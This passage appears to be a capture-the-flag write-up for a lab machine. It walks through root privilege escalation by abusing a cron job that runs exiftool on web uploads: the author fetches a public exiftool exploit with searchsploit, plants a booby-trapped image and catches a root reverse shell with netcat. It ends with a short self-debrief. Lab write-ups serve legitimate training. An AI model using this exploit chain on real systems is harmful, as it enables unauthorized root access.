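def cron_matches(expression, minute, hour, day, month, weekday):
    """Check a five-field cron expression against one point in time."""
    fields = expression.split()
    if len(fields) != 5:
        raise ValueError("expected five fields")
    moment = (minute, hour, day, month, weekday)
    return all(field_matches(f, v) for f, v in zip(fields, moment))


# Five splats match any minute of any day.
print(cron_matches("* * * * *", 13, 7, 30, 4, 2))
# A job pinned to minute 0 does not fire at minute 13.
print(cron_matches("0 * * * *", 13, 7, 30, 4, 2))
```

For this machine the takeaway is that anything we plant only has to wait a minute at most before root runs the job again.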

Only the file owner (root) has permission to write to the file, meaning we are unable to maliciously alter it. The script executes the command exiftool "$IMAGES/$filename" >> $LOGFILE. Some searching shows that exiftool is for reading/writing metadata in images. This particular command grabs the images from '/var/www/html/subrion/uploads'. It then appends the command output to a log file.



The directory looks like a web directory we may have access to. Going back to the web page’s admin dashboard, the Uploads directory is found at Content –> Uploads.

Notice the button for uploading files. Also, our initial webshell file is already in there. Note: the name doesn’t match what was previously in this write-up since I’ve gone back to re-exploit the machine for the sake of writing this report.



Checking searchsploit, a search for exiftool brings up a winning result. We copy it to the working directory.

searchsploit exiftool

searchsploit -m linux/local/50911.py

Documentation online states that exiftool and the djvulibre-bin package are required to fire the exploit. Exiftool should already be installed on Kali; however, I had to install djvulibre-bin. It was fairly simple.

sudo apt-get update -y

sudo apt-get install -y djvulibre-bin

Running the script naked, without parameters, brings up a nice help menu explaining the syntax.

A source image is not required, but that’s not very fun. So I found a free clip art of a cow being “exfiltrated” into a UFO.

Set the proper command parameters to match my Kali machine. Remember to pick a different port than the one your other shell is on (assuming that it is still up). The script will show the payload used and export the new image as image.jpg.



Set up your netcat listener before dropping the file onto the target’s web interface since the cron job executes once every minute.

Drop that file!

Check back on the netcat listener. Enter commands as root.

The Debriefing

What went right?

I was able to successfully exploit Exfiltrated from beginning to end. In my original notes, I used pwnkit for privilege escalation. Running linpeas on the target suggested that it was vulnerable. It makes for an easy win, but a very boring write-up. So, I decided to find an alternative way.

I am also getting better at making the write-up itself. I discovered new tools and plugins, particularly for making code blocks a bit easier on the eyes.

What went wrong?

My initial notes were not that great and I had to essentially re-exploit the entire machine. That may not be a bad technique, actually. But it does not make for speedy report creation. I am slow.

I am struggling with figuring how much detail to go into with these. Not sure who the real target audience is. I treat it as if I am the target audience and am doing this to get a broader understanding of what is happening “under the hood”.

Lessons Learned

The report is starting to look better. I need to be better at note taking. I am getting faster at creation, but need to continue to find ways to streamline the process. The answer here seems to be the usual solution… practice.